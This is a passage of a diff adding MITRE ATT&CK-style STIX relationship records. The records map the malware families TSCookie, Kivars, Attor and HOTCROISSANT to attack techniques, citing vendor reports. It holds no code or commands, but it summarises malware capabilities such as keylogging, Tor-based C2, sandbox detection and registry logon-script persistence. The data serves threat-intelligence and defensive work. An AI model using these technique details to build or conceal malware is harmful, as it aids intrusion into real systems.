+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--76ac7989-c5cc-42e2-93e3-d6c476f01ace",
+ "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "external_references": [
+ {
+ "source_name": "JPCert TSCookie March 2018",
+ "url": "https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html",
+ "description": "Tomonaga, S.. (2018, March 6). Malware \u201cTSCookie\u201d. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[TSCookie](https://attack.mitre.org/software/S0436) has the ability to decrypt, load, and execute a DLL and its resources.(Citation: JPCert TSCookie March 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--2b062058-3345-4993-9715-6ad6e98dc2ad",
+ "type": "relationship",
+ "modified": "2020-05-06T17:47:43.700Z",
+ "created": "2020-05-06T17:47:43.700Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--76ac7989-c5cc-42e2-93e3-d6c476f01ace",
+ "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
+ "external_references": [
+ {
+ "source_name": "JPCert TSCookie March 2018",
+ "url": "https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html",
+ "description": "Tomonaga, S.. (2018, March 6). Malware \u201cTSCookie\u201d. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[TSCookie](https://attack.mitre.org/software/S0436) has the ability to execute shell commands on the infected host.(Citation: JPCert TSCookie March 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--183b5c91-0424-4a26-830c-cdeb8959b72a",
+ "type": "relationship",
+ "modified": "2020-05-06T17:47:43.710Z",
+ "created": "2020-05-06T17:47:43.710Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--76ac7989-c5cc-42e2-93e3-d6c476f01ace",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "JPCert BlackTech Malware September 2019",
+ "url": "https://blogs.jpcert.or.jp/en/2019/09/tscookie-loader.html",
+ "description": "Tomonaga, S.. (2019, September 18). Malware Used by BlackTech after Network Intrusion. Retrieved May 6, 2020."
+ },
+ {
+ "source_name": "JPCert TSCookie March 2018",
+ "url": "https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html",
+ "description": "Tomonaga, S.. (2018, March 6). Malware \u201cTSCookie\u201d. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[TSCookie](https://attack.mitre.org/software/S0436) can multiple protocols including HTTP and HTTPS in communication with command and control (C2) servers.(Citation: JPCert BlackTech Malware September 2019)(Citation: JPCert TSCookie March 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--2978353c-a652-4d42-a5da-4b937b09c8cf",
+ "type": "relationship",
+ "modified": "2020-07-07T14:05:07.584Z",
+ "created": "2020-05-06T17:47:43.717Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b2d134a1-7bd5-4293-94d4-8fc978cb1cd7",
+ "target_ref": "attack-pattern--54a649ff-439a-41a4-9856-8d144a2551ba",
+ "external_references": [
+ {
+ "source_name": "TrendMicro BlackTech June 2017",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/",
+ "description": "Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech\u2019s Cyber Espionage Campaigns. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Kivars](https://attack.mitre.org/software/S0437) has the ability to remotely trigger keyboard input and mouse clicks. (Citation: TrendMicro BlackTech June 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--a51ea812-182b-47d8-94c2-331e4d9973f5",
+ "type": "relationship",
+ "modified": "2020-05-06T18:10:59.232Z",
+ "created": "2020-05-06T18:10:59.232Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b2d134a1-7bd5-4293-94d4-8fc978cb1cd7",
+ "target_ref": "attack-pattern--cbb66055-0325-4111-aca0-40547b6ad5b0",
+ "external_references": [
+ {
+ "source_name": "TrendMicro BlackTech June 2017",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/",
+ "description": "Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech\u2019s Cyber Espionage Campaigns. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Kivars](https://attack.mitre.org/software/S0437) has the ability to conceal its activity through hiding active windows.(Citation: TrendMicro BlackTech June 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--7ded147e-f252-490a-b0d7-d8b3492c84eb",
+ "type": "relationship",
+ "modified": "2020-05-06T18:10:59.275Z",
+ "created": "2020-05-06T18:10:59.275Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b2d134a1-7bd5-4293-94d4-8fc978cb1cd7",
+ "target_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688",
+ "external_references": [
+ {
+ "source_name": "TrendMicro BlackTech June 2017",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/",
+ "description": "Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech\u2019s Cyber Espionage Campaigns. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Kivars](https://attack.mitre.org/software/S0437) has the ability to capture screenshots on the infected host.(Citation: TrendMicro BlackTech June 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--8a039d93-db2d-4a98-81d4-357425574bab",
+ "type": "relationship",
+ "modified": "2020-06-03T20:19:35.061Z",
+ "created": "2020-05-06T18:10:59.296Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b2d134a1-7bd5-4293-94d4-8fc978cb1cd7",
+ "target_ref": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4",
+ "external_references": [
+ {
+ "source_name": "TrendMicro BlackTech June 2017",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/",
+ "description": "Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech\u2019s Cyber Espionage Campaigns. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Kivars](https://attack.mitre.org/software/S0437) has the ability to initiate keylogging on the infected host.(Citation: TrendMicro BlackTech June 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--7d086d88-59d1-444a-a766-ef52216625ff",
+ "type": "relationship",
+ "modified": "2020-05-06T18:10:59.301Z",
+ "created": "2020-05-06T18:10:59.301Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b2d134a1-7bd5-4293-94d4-8fc978cb1cd7",
+ "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
+ "external_references": [
+ {
+ "source_name": "TrendMicro BlackTech June 2017",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/",
+ "description": "Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech\u2019s Cyber Espionage Campaigns. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Kivars](https://attack.mitre.org/software/S0437) has the ability to uninstall malware from the infected host.(Citation: TrendMicro BlackTech June 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--0aa51def-3a75-4c69-8b65-82559d8f4c83",
+ "type": "relationship",
+ "modified": "2020-05-06T18:10:59.308Z",
+ "created": "2020-05-06T18:10:59.308Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b2d134a1-7bd5-4293-94d4-8fc978cb1cd7",
+ "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
+ "external_references": [
+ {
+ "source_name": "TrendMicro BlackTech June 2017",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/",
+ "description": "Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech\u2019s Cyber Espionage Campaigns. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Kivars](https://attack.mitre.org/software/S0437) has the ability to list drives on the infected host.(Citation: TrendMicro BlackTech June 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--37e4bb23-505b-41bb-a2f4-98501b065598",
+ "type": "relationship",
+ "modified": "2020-05-06T18:10:59.312Z",
+ "created": "2020-05-06T18:10:59.312Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b2d134a1-7bd5-4293-94d4-8fc978cb1cd7",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "TrendMicro BlackTech June 2017",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/",
+ "description": "Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech\u2019s Cyber Espionage Campaigns. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Kivars](https://attack.mitre.org/software/S0437) has the ability to download and execute files.(Citation: TrendMicro BlackTech June 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--93dc6241-29b4-45c6-9593-f7862936ffd8",
+ "type": "relationship",
+ "modified": "2020-05-06T18:10:59.316Z",
+ "created": "2020-05-06T18:10:59.316Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6fe8a2a1-a1b0-4af8-953d-4babd329f8f8",
+ "target_ref": "malware--b2d134a1-7bd5-4293-94d4-8fc978cb1cd7",
+ "external_references": [
+ {
+ "source_name": "TrendMicro BlackTech June 2017",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/",
+ "description": "Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech\u2019s Cyber Espionage Campaigns. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "(Citation: TrendMicro BlackTech June 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--28ee4a1e-1e63-4c72-8424-4f923b074ad9",
+ "type": "relationship",
+ "modified": "2020-05-06T18:12:24.034Z",
+ "created": "2020-05-06T18:12:24.034Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--c93fccb1-e8e8-42cf-ae33-2ad1d183913a",
+ "target_ref": "malware--aad11e34-02ca-4220-91cd-2ed420af4db3",
+ "external_references": [
+ {
+ "source_name": "US-CERT HOTCROISSANT February 2020",
+ "url": "https://www.us-cert.gov/ncas/analysis-reports/ar20-045d",
+ "description": "US-CERT. (2020, February 20). MAR-10271944-1.v1 \u2013 North Korean Trojan: HOTCROISSANT. Retrieved May 1, 2020."
+ }
+ ],
+ "description": "(Citation: US-CERT HOTCROISSANT February 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--636c3816-21ed-46f7-8837-2334bed88e42",
+ "type": "relationship",
+ "modified": "2020-05-06T19:32:14.855Z",
+ "created": "2020-05-06T19:32:14.855Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Attor](https://attack.mitre.org/software/S0438) can set attributes of log files and directories to HIDDEN, SYSTEM, ARCHIVE, or a combination of those.(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--c47d3636-65dd-4da1-8c90-e3e7aeb7effb",
+ "type": "relationship",
+ "modified": "2020-07-07T12:35:12.068Z",
+ "created": "2020-05-06T20:40:19.102Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Attor](https://attack.mitre.org/software/S0438) has automatically collected data about the compromised system.(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--982474f3-d61d-49ac-b5be-30553e872db1",
+ "type": "relationship",
+ "modified": "2020-07-07T12:35:12.033Z",
+ "created": "2020-05-06T20:40:19.118Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Attor](https://attack.mitre.org/software/S0438)'s installer plugin can schedule rundll32.exe to load the dispatcher.(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--3c58b596-6a79-4c28-be76-40e7ae9afd8a",
+ "type": "relationship",
+ "modified": "2020-05-06T20:40:19.127Z",
+ "created": "2020-05-06T20:40:19.127Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--f1951e8a-500e-4a26-8803-76d95c4554b4",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Attor](https://attack.mitre.org/software/S0438)'s dispatcher can be executed as a service.(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--c05978ea-b814-473e-a073-9bae9ab7695b",
+ "type": "relationship",
+ "modified": "2020-05-06T20:40:19.172Z",
+ "created": "2020-05-06T20:40:19.172Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--eb125d40-0b2d-41ac-a71a-3229241c2cd3",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Attor](https://attack.mitre.org/software/S0438)'s dispatcher can establish persistence via adding a Registry key with a logon script HKEY_CURRENT_USER\\Environment \"UserInitMprLogonScript\" .(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--29e33373-f05e-421b-9b5d-fc2d617b36af",
+ "type": "relationship",
+ "modified": "2020-05-06T20:40:19.179Z",
+ "created": "2020-05-06T20:40:19.179Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--4ae4f953-fe58-4cc8-a327-33257e30a830",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Attor](https://attack.mitre.org/software/S0438) can obtain application window titles and then determines which windows to perform Screen Capture on.(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--0dfdfffc-2d1b-487f-91e0-66d81b185367",
+ "type": "relationship",
+ "modified": "2020-05-06T21:01:23.245Z",
+ "created": "2020-05-06T21:01:23.245Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Attor](https://attack.mitre.org/software/S0438)'s installer plugin can schedule a new task that loads the dispatcher on boot/logon.(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--98d32782-62e2-4cd7-90b1-78c8a062b6ed",
+ "type": "relationship",
+ "modified": "2020-05-06T21:01:23.423Z",
+ "created": "2020-05-06T21:01:23.423Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Attor](https://attack.mitre.org/software/S0438) can download additional plugins, updates and other files. (Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--57a19f3b-838f-45df-8cfe-964cbe5396d2",
+ "type": "relationship",
+ "modified": "2020-05-06T21:01:23.426Z",
+ "created": "2020-05-06T21:01:23.426Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Attor](https://attack.mitre.org/software/S0438) has staged collected data in a central upload directory prior to exfiltration.(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--6376c6be-5ec7-4775-8984-13a1474dc92d",
+ "type": "relationship",
+ "modified": "2020-05-06T21:01:23.429Z",
+ "created": "2020-05-06T21:01:23.429Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--29be378d-262d-4e99-b00d-852d573628e6",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Attor](https://attack.mitre.org/software/S0438) can detect whether it is executed in some virtualized or emulated environment by searching for specific artifacts, such as communication with I/O ports and using VM-specific instructions.(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--270d73c2-27fb-43ac-80b9-d4ea3fef2c06",
+ "type": "relationship",
+ "modified": "2020-05-06T21:01:23.438Z",
+ "created": "2020-05-06T21:01:23.438Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--c32f7008-9fea-41f7-8366-5eb9b74bd896",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Attor](https://attack.mitre.org/software/S0438) has opened the registry and performed query searches.(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--fc661e81-fc5e-4243-874e-f311bc5a2d8d",
+ "type": "relationship",
+ "modified": "2020-05-06T21:01:23.444Z",
+ "created": "2020-05-06T21:01:23.444Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--24bfaeba-cb0d-4525-b3dc-507c77ecec41",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Attor](https://attack.mitre.org/software/S0438) has encrypted data symmetrically using a randomly generated Blowfish (OFB) key which is encrypted with a public RSA key.(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--1e3a1ea2-55fb-4abc-970a-e384b4c7d314",
+ "type": "relationship",
+ "modified": "2020-05-14T20:55:00.175Z",
+ "created": "2020-05-06T21:01:23.447Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--a782ebe2-daba-42c7-bc82-e8e9d923162d",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Attor](https://attack.mitre.org/software/S0438) has used Tor for C2 communication.(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--278b9898-50c6-4c6d-9a35-7079ed580e78",
+ "type": "relationship",
+ "modified": "2020-05-06T21:01:23.454Z",
+ "created": "2020-05-06T21:01:23.454Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--0a5231ec-41af-4a35-83d0-6bdf11f28c65",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Attor](https://attack.mitre.org/software/S0438)'s dispatcher can execute additional plugins by loading the respective DLLs.(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--831513ed-bbf2-406f-ab74-bfffa8a376b7",
+ "type": "relationship",
+ "modified": "2020-05-14T20:43:41.551Z",
+ "created": "2020-05-06T21:01:23.459Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Attor](https://attack.mitre.org/software/S0438)'s dispatcher has used CreateProcessW API for execution.(Citation: ESET Attor Oct 2019)",
